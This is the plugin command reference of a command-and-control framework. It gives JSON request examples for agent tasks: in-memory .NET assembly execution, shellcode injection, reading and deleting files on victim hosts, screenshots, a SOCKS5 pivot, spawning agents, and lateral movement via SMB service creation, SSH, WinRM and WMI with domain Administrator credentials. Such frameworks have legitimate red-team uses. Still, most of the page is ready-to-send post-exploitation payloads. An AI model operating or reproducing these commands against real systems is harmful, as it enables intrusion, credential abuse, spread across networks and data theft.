Skip to content

Plugin commands

List on default plugin commands, their configuration and examples.

connect-tcp

Used along with "Relay Agent Bind TCP listener" listener. Agent created and executed with that, will wait for connections initialized via connect-tcp command.

Parameters:

  • host: IP or domain name where waiting agent was executed
  • port: Port on what the waiting agent is listening

Example(POST content)

1
2
3
4
5
6
7
{
  "template": "connect-tcp",
  "configuration": {
    "host": "192.168.12.12",
    "port": 8888
  }
}

execute-assembly

Executes .NET executable in memory

Parameters:

  • executable: .NET executable file content (if provided via API, have to be base64 encoded)
  • parameters: Parameters to be provided to .NET as command line arguments

Example(POST content)

1
2
3
4
5
6
7
{
  "template": "execute-assembly",
  "configuration": {
    "executable": "{SHARPUP executable in base64}",
    "parameters": ["audit"]
  }
}

fs-delete

This command deletes file in agent filesystem

Parameters:

  • filepath: Path of the file to delete (environment variables are supported)

Example(POST content)

1
2
3
4
5
6
{
  "template": "fs-delete",
  "configuration": {
    "filepath": "c:\\some\\dir\\to_delete.txt"
  }
}

fs-read

This command reads and returns file from agent filesystem

Parameters:

  • filepath: Path of the file to read (environment variables are supported)

Example(POST content)

1
2
3
4
5
6
{
  "template": "fs-read",
  "configuration": {
    "filepath": "c:\\some\\dir\\s3cr3t.txt"
  }
}

fs-write

This command reads and returns file from agent filesystem

Parameters:

  • filepath: Path of the file being written (environment variables are supported)
  • data: Content of the file (if provided via API, have to be base64 encoded)

Example(POST content)

1
2
3
4
5
6
7
{
  "template": "fs-write",
  "configuration": {
    "filepath": "c:\\some\\dir\\hello.txt",
    "data": "SEVMTE8gV09STEQ="
  }
}

inject

Injects and executes shellcode

Parameters:

  • shellcode: shellcode to execute (if provided via API, have to be base64 encoded)

Example(POST content)

1
2
3
4
5
6
{
  "template": "inject",
  "configuration": {
    "shellcode": "{some type of shellcode in base64}"
  }
}

jump-service

Command for latteral movement. You can copy file to target machine over SMB and then create & start service pointing to that or any other executable

Parameters:

  • payloadId: Payload used in jump - should be service exe
  • copyMethod: What method to use for copying payload (SMB, NONE)
  • copyPath: Where to copy file in target machine
  • target: Target machine ip/name
  • servicePath: Path of the created service
  • serviceName: Name of the created service
  • serviceDisplayName: Display name of the created service
  • username: Username to use for copy and jump (if needed)
  • password: Password to use for copy and jump (if needed)

Example(POST content)

{
  "template": "jump-service",
  "configuration": {
    "payloadId": 1,
    "copyMethod": "SMB",
    "copyPath": "c:\\new_service.exe",
    "target": "target-machine",
    "servicePath": "c:\\new_service.exe",
    "serviceName": "new-service",
    "serviceDisplayName": "New service",
    "username": "MYDOMAIN\\Administrator",
    "password": "FunnyItWorkedLastTime!"
  }
}

jump-ssh

Command for latteral movement. You can copy file to target machine over SMB and then run it or any command over SSH

Parameters:

  • payloadId: Payload used in jump - should be executable exe
  • copyMethod: What method to use for copying payload (SMB, NONE)
  • copyPath: Where to copy file in target machine
  • target: Target machine ip/name
  • cmdline: Command line to run on target machine
  • username: Username to use for copy and jump
  • password: Password to use for copy and jump
  • privateKeyPassword: Password of the private key file

Example(POST content)

{
  "template": "jump-ssh",
  "configuration": {
    "payloadId": 1,
    "copyMethod": "SMB",
    "copyPath": "c:\\new_agent.exe",
    "target": "target-machine",
    "cmdline": "c:\\new_agent.exe",
    "username": "MYDOMAIN\\Administrator",
    "password": "FunnyItWorkedLastTime!"
  }
}

jump-winrm

Command for latteral movement. You can copy file to target machine over SMB and then run it or any powershell command over Windows Remote Management

Parameters:

  • payloadId: Payload used in jump - should be executable exe
  • copyMethod: What method to use for copying payload (SMB, NONE)
  • copyPath: Where to copy file in target machine
  • target: Target machine ip/name
  • executablePath: Path of the executable to run
  • customPowershell: Custom powershell to run
  • username: Username to use for copy and jump (if needed)
  • password: Password to use for copy and jump (if needed)

Example(POST content)

{
  "template": "jump-winrm",
  "configuration": {
    "payloadId": 1,
    "copyMethod": "SMB",
    "copyPath": "c:\\new_agent.exe",
    "target": "target-machine",
    "executablePath": "c:\\new_agent.exe",
    "username": "MYDOMAIN\\Administrator",
    "password": "FunnyItWorkedLastTime!"
  }
}

jump-wmi

Command for latteral movement. You can copy file to target machine over SMB and then run it or any command over Windows Management Instrumentation

Parameters:

  • payloadId: Payload used in jump - should be executable exe
  • copyMethod: What method to use for copying payload (SMB, NONE)
  • copyPath: Where to copy file in target machine
  • target: Target machine ip/name
  • cmdline: Command line to run on target machine
  • username: Username to use for copy and jump (if needed)
  • password: Password to use for copy and jump (if needed)

Example(POST content)

{
  "template": "jump-wmi",
  "configuration": {
    "payloadId": 1,
    "copyMethod": "SMB",
    "copyPath": "c:\\new_agent.exe",
    "target": "target-machine",
    "cmdline": "c:\\new_agent.exe",
    "username": "MYDOMAIN\\Administrator",
    "password": "FunnyItWorkedLastTime!"
  }
}

procinfo

Returns additional information about agent's process

Parameters: None

Example(POST content)

1
2
3
4
{
  "template": "procinfo",
  "configuration": {}
}

screenshot

Makes screenshot on target machine and returns the picture

Parameters: None

Example(POST content)

1
2
3
4
{
  "template": "screenshot",
  "configuration": {}
}

socks5

Creates SOCKS5 proxy into agent network

Parameters:

  • port: Port that is opened by C2 for user to use as socks5 proxy

Example(POST content)

1
2
3
4
5
6
{
  "template": "socks5",
  "configuration": {
    "port": "8765"
  }
}

spawn

Spawns new agent

Parameters:

  • listenerId: What listener the agent will connect
  • payloadType: Type of the payload
  • encryptedCommunication: Should communication be encrypted

Example(POST content)

1
2
3
4
5
6
7
8
{
  "template": "spawn",
  "configuration": {
    "listenerId": "1",
    "payloadType": "WINDOWS_X64_STAGELESS",
    "encryptedCommunication": true
  }
}